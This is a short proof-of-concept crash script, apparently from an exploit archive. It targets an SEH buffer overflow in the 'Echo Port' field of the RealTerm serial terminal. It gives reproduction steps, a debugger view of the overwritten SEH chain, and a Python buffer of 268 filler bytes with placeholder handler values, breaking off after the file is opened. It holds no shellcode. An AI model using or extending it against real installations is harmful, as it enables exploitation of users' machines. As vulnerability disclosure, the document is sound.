# -*- coding: utf-8 -*-
# Exploit Title: RealTerm: Serial Terminal - 'Echo Port' Overflow Crash (SEH) (PoC)
# Date: 16/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version:
# Tested on: Windows 10 / Windows XP
# Proof of Concept:
# 1.- Run the python script "EchoPort.py", it will create a new file "EchoPort.txt"
# 2.- Copy the content of the new file 'EchoPort.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Crashed
# After the execution of POC, the SEH chain looks like this:
# 0012F57C 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#0012F568 41414141AAAA
#0012F56C 41414141AAAA
#0012F570 41414141AAAA
#0012F574 41414141AAAA
#0012F578 42424242BBBBPointer to next SEH record
#0012F57C 43434343CCCCSE handler
buffer = "\x41" * 268
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("EchoPort.txt", "w")